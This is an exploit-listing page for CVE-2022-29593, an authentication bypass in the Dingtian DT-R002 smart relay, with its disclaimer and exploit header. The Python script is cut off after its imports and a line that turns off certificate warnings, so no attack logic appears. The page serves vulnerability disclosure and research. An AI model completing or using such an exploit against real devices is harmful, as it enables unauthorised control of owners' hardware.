Exploits / Vulnerability Discovered : 2022-07-29 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Dingtiandtr002 3.1.276a authentication bypass is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass
# Google Dork: NA
# Date: 13th July 2022
# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
# Author Github Page: https://9lyph.github.io/CVE-2022-29593/
# Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html
# Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download
# Version: V3.1.276A
# Tested on: MAC OSX
# CVE : CVE-2022-29593#!/usr/local/bin/python3
# Author: Victor Hanna (SpiderLabs)
# DingTian DT-R002 2CH Smart Relay
# CWE-294 - Authentication Bypass by Capture-replay
import requests
import re
import urllib.parse
from colorama import init
from colorama import Fore, Back, Style
import sys
import os
import time
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)